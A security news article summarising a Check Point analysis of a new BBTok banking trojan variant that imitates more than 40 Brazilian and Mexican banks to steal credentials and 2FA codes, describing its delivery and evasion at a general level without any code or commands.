New BBTok Banking Trojan Variant Hits 40+ Latin American Banks: A fresh strain of the BBTok banking trojan is actively targeting users in Latin America, with a focus on Brazil and Mexico.
This trojan is known for its ability to mimic the interfaces of over 40 banks in these regions and deceive victims into divulging their 2FA codes and payment card details.
Key Takeaways to New BBTok Banking Trojan Variant Hits 40+ Latin American Banks:
Table of Contents
- A new variant of the BBTok banking trojan is spreading across Latin America, particularly in Brazil and Mexico.
- BBTok disguises itself by replicating the interfaces of more than 40 banks, tricking users into revealing sensitive banking information.
- The trojan employs phishing emails with diverse file types and uses custom server-side PowerShell scripts to generate unique payloads for each victim.
Stealthy Trojan Targeting Latin America
In a recent discovery, a new strain of the BBTok banking trojan is actively targeting users in Latin America, with a particular focus on Brazil and Mexico.
This trojan is notorious for its ability to replicate the interfaces of over 40 banks in these regions, luring victims into providing their 2FA codes and payment card information.
Custom Payload Generation and Phishing Emails
The attackers behind BBTok employ custom server-side PowerShell scripts to generate distinct payloads for each victim, considering factors like the operating system and country.
They distribute these payloads through phishing emails that utilize various file types, making detection challenging.
Windows-Based Banking Malware
BBTok, which emerged in 2020, is a Windows-based banking trojan equipped with a range of features commonly found in trojans.
It can terminate processes, execute remote commands, manipulate keyboards, and present fake login pages for banks operating in Brazil and Mexico.
Complex Attack Chains
The attack methods used by BBTok are relatively straightforward but effective. They involve deceptive links or ZIP file attachments that quietly deploy the trojan from a remote server.
These attacks are tailored for both Windows 7 and Windows 10 systems, and designed to evade detection mechanisms such as the Antimalware Scan Interface (AMSI).
Geo-Targeting and Evasion Techniques
To stay hidden, BBTok utilizes living-off-the-land binaries (LOLBins) and geofencing checks to ensure that only users in Brazil or Mexico are targeted before delivering the malware via the PowerShell script.
Credential Theft and Account Takeovers
Once activated, BBTok establishes connections with a remote server to simulate security verification pages from various banks.
By impersonating Latin American banks’ interfaces, the trojan aims to harvest users’ credentials and authentication information, facilitating account takeovers.
Operator’s Cautious Approach
Interestingly, all banking activities by BBTok are carried out only upon direct command from its command-and-control (C2) server, avoiding automatic execution on every infected system.
Increasing Threat in Latin America
The analysis of BBTok reveals significant improvements in obfuscation and targeting since its emergence in 2020. The inclusion of Spanish and Portuguese in the source code and phishing emails suggests the attackers’ origin.
It is estimated that over 150 users have been infected by BBTok.
Ongoing Threat in the Region
While BBTok has managed to evade detection due to its sophisticated techniques and selective targeting in Mexico and Brazil, it remains an active threat.
Its diverse capabilities and unique delivery methods make it a danger to organizations and individuals in the region.
Conclusion:
The emergence of a new BBTok banking trojan variant highlights the evolving nature of cyber threats, particularly in the Latin American region.
Organizations and individuals should remain vigilant and take necessary precautions to protect against such threats.
About Check Point:
Check Point is a leading cybersecurity company known for its expertise in threat prevention, providing solutions to safeguard organizations against various cyber threats and attacks.
